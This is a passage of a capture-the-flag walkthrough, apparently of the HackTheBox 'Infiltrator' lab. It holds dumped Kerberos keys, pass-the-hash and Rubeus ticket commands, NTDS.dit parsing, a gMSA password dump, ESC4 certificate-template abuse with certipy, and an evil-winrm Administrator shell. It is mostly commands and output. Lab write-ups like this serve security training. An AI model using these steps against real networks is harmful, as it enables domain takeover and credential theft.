infiltrator.htb\M.harris:aes256-cts-hmac-sha1-96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49
infiltrator.htb\M.harris:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0
infiltrator.htb\M.harris:des-cbc-md5:3ee3688376f2e5ce
infiltrator.htb\D.anderson:aes256-cts-hmac-sha1-96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f
infiltrator.htb\D.anderson:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69
infiltrator.htb\D.anderson:des-cbc-md5:1529a829132a2345
infiltrator.htb\L.clark:aes256-cts-hmac-sha1-96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc
infiltrator.htb\L.clark:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983
infiltrator.htb\L.clark:des-cbc-md5:cd023d5d70e6aefd
infiltrator.htb\O.martinez:aes256-cts-hmac-sha1-96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f
infiltrator.htb\O.martinez:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120
infiltrator.htb\O.martinez:des-cbc-md5:f80bc202755d2cfd
infiltrator.htb\A.walker:aes256-cts-hmac-sha1-96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a
infiltrator.htb\A.walker:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4
infiltrator.htb\A.walker:des-cbc-md5:a7e6cde06d6e153b
infiltrator.htb\K.turner:aes256-cts-hmac-sha1-96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8
infiltrator.htb\K.turner:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b
infiltrator.htb\K.turner:des-cbc-md5:4607b9eaec6838ba
infiltrator.htb\E.rodriguez:aes256-cts-hmac-sha1-96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5
infiltrator.htb\E.rodriguez:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c
infiltrator.htb\E.rodriguez:des-cbc-md5:9d5bdaf2cd26165d
[*] Cleaning up...Pass-the-hash method only works for Clark? (the foothold user)
└─$ netexec smb infiltrator.htb -u usernames -H hashes --no-bruteforce --continue-on-success
SMB 10.129.44.52 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\Administrator:7bf62b9c45112ffdadb7b6b4b9299dd2 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\DC$:fe4767309896203c581b9fc3c5e23b00 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\krbtgt:454fcbc37690c6e4628ab649e8e285a5 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\winrm_svc:84287cd16341b91eb93a58456b73e30f STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\lan_managment:e8ade553d9b0cb1769f429d897c92931 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\M.harris:fc236589c448c620417b15597a3d3ca7 STATUS_ACCOUNT_RESTRICTION
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\D.anderson:627a2cb0adc7ba12ea11174941b3da88 STATUS_ACCOUNT_RESTRICTION
SMB 10.129.44.52 445 DC01 [+] infiltrator.htb\L.clark:627a2cb0adc7ba12ea11174941b3da88
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\O.martinez:eb86d7bcb30c8eac1bdcae5061e2dff4 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\A.walker:46389d8dfdfcf0cbe262a71f576e574b STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\K.turner:48bcd1cdc870c6285376a990c2604531 STATUS_LOGON_FAILURE
SMB 10.129.44.52 445 DC01 [-] infiltrator.htb\E.rodriguez:b1918c2ce6a62f4eee11c51b6e2e965a STATUS_LOGON_FAILURERubeus only gives tickets for Clark and Anderson...
.\rb.exe asktgt /domain:infiltrator.htb /user:"DC$" /aes256:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"DC$" /aes128:d2a3d7c9ee6965b1e3cd710ed1ceed0f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"krbtgt" /aes256:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"krbtgt" /aes128:7874dff8138091d6c344381c9c758540 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"winrm_svc" /aes256:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"winrm_svc" /aes128:0faf5e0205d6f43ae37020f79f60606a /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"lan_managment" /aes256:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"lan_managment" /aes128:48f45b8eb2cbd8dbf578241ee369ddd9 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"M.harris" /aes256:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"M.harris" /aes128:2ee0cd05c3fa205a92e6837ff212b7a0 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"D.anderson" /aes256:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"D.anderson" /aes128:021e189e743a78a991616821138e2e69 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"L.clark" /aes256:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"L.clark" /aes128:5041c75e19de802e0f7614f57edc8983 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"O.martinez" /aes256:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"O.martinez" /aes128:33fdf738e13878a8101e3bf929a5a120 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"A.walker" /aes256:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"A.walker" /aes128:768672b783131ed963b9deeac0a6d2e4 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"K.turner" /aes256:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"K.turner" /aes128:b20f41c0d3b8fb6e1b793af4a835109b /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"E.rodriguez" /aes256:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5 /ptt
.\rb.exe asktgt /domain:infiltrator.htb /user:"E.rodriguez" /aes128:ddd37cf706781414885f561c3b469d0c /pttNTDS database can be parsed into SQLite version: https://www.thehacker.recipes/ad/movement/credentials/dumping/ntds#ntds-directory-parsing-and-extraction
└─$ ntdsdotsqlite ./Active\ Directory/ntds.dit --system ./registry/SYSTEM -o ntds.sqliteIn the user_accounts table we find lan_managment description which contains the password!
lan_managment
Creds:
lan_managment:l@n_M@an!1331
winrm doesn't work, but smb confirms the password is valid.
└─$ evil-winrm -i dc01.infiltrator.htb -u lan_managment -p 'l@n_M@an!1331'
Error: Exiting with code 1
└─$ netexec smb infiltrator.htb -u 'lan_managment' -p 'l@n_M@an!1331'
SMB 10.129.230.229 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.230.229 445 DC01 [+] infiltrator.htb\lan_managment:l@n_M@an!1331Enumerate AD again with bloodhound:
└─$ bloodhound-python -u 'lan_managment@infiltrator.htb' -p 'l@n_M@an!1331' -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op lanNote: You might need to add victim server to
/etc/resolv.conf
https://www.netexec.wiki/ldap-protocol/dump-gmsa
└─$ netexec ldap infiltrator.htb -u 'lan_managment' -p 'l@n_M@an!1331' --gmsa
SMB 10.129.230.229 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.230.229 636 DC01 [+] infiltrator.htb\lan_managment:l@n_M@an!1331
LDAPS 10.129.230.229 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.230.229 636 DC01 Account: infiltrator_svc$ NTLM: 52dfec373c144cb8d50334cb73934612infiltrator_svc$
Creds:
infiltrator_svc$:52dfec373c144cb8d50334cb73934612
Nothing new from this loot:
└─$ bloodhound-python -u 'infiltrator_svc$@infiltrator.htb' --hashes ':52dfec373c144cb8d50334cb73934612' -dc dc01.infiltrator.htb -d infiltrator.htb -c all --zip -op infiltrator_svcESC4
└─$ certipy-ad find -username 'infiltrator_svc$@infiltrator.htb' -vulnerable -hashes ':52dfec373c144cb8d50334cb73934612'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'infiltrator-DC01-CA'
[*] Saved BloodHound data to '20240904054156_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20240904054156_Certipy.txt'
[*] Saved JSON output to '20240904054156_Certipy.json'
└─$ cat 20240904054156_Certipy.txt
Certificate Authorities
0
CA Name : infiltrator-DC01-CA
DNS Name : dc01.infiltrator.htb
Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb
Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149
Certificate Validity Start : 2023-12-08 01:42:38+00:00
Certificate Validity End : 2124-08-04 18:55:57+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : INFILTRATOR.HTB\Administrators
Access Rights
ManageCertificates : INFILTRATOR.HTB\Administrators
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
ManageCa : INFILTRATOR.HTB\Administrators
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
Enroll : INFILTRATOR.HTB\Authenticated Users
Certificate Templates
0
Template Name : Infiltrator_Template
Display Name : Infiltrator_Template
Certificate Authorities : infiltrator-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
PendAllRequests
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Smart Card Logon
Server Authentication
KDC Authentication
Client Authentication
Requires Manager Approval : True
Requires Key Archival : False
Authorized Signatures Required : 1
Validity Period : 99 years
Renewal Period : 650430 hours
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : INFILTRATOR.HTB\Local System
Full Control Principals : INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Owner Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
Write Dacl Principals : INFILTRATOR.HTB\infiltrator_svc
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
INFILTRATOR.HTB\Domain Admins
INFILTRATOR.HTB\Enterprise Admins
INFILTRATOR.HTB\Local System
[!] Vulnerabilities
ESC4 : 'INFILTRATOR.HTB\\infiltrator_svc' has dangerous permissionshttps://github.com/ly4k/Certipy?tab=readme-ov-file#esc4https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-templates-esc4
└─$ certipy-ad template -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -template Infiltrator_Template -save-old
└─$ certipy-ad template -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -template Infiltrator_Template
└─$ certipy-ad req -username 'infiltrator_svc$@infiltrator.htb' -hashes ':52dfec373c144cb8d50334cb73934612' -ca infiltrator-DC01-CA -target dc01.infiltrator.htb -template Infiltrator_Template -upn administrator@infiltrator.htb -timeout 1000
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 129
[*] Got certificate with UPN 'administrator@infiltrator.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
└─$ certipy-ad auth -pfx administrator.pfx -username 'Administrator' -domain infiltrator.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@infiltrator.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@infiltrator.htb': aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1Note:
certipy-ad reqtook like forever to work because oftemplateprobably didn't work or it's the box. Make sure to runtemplateand thenreqfew times!!!
Administrator
└─$ evil-winrm -i dc01.infiltrator.htb -u Administrator -H '1356f502d2764368302ff0369b1121a1'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
Folder PATH listing
Volume serial number is 96C7-B603
C:.
+---Desktop
| | backup.zip
| | root.txt
| |
| \---Infiltrator ADCS Backups
| | infiltrator-DC01-CA.p12
| |
| \---DataBase
| certbkxp.dat
| edb00002.log
| infiltrator-DC01-CA.edb
+---Links
| ADCSTemplate.psm1
| Autologon64.exe
| cleaning_up.ps1
| cleanup_ca.ps1
| Desktop.lnk
| Downloads.lnk
| Infiltrator_Template.json
| ldap.ps1
| Lock-BitLocker.ps1
| messenger.ps1
| start_end_rdp.ps1
|Root.txt
*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/root.txt
f40be542524863588bc1b33049aa4488Last updated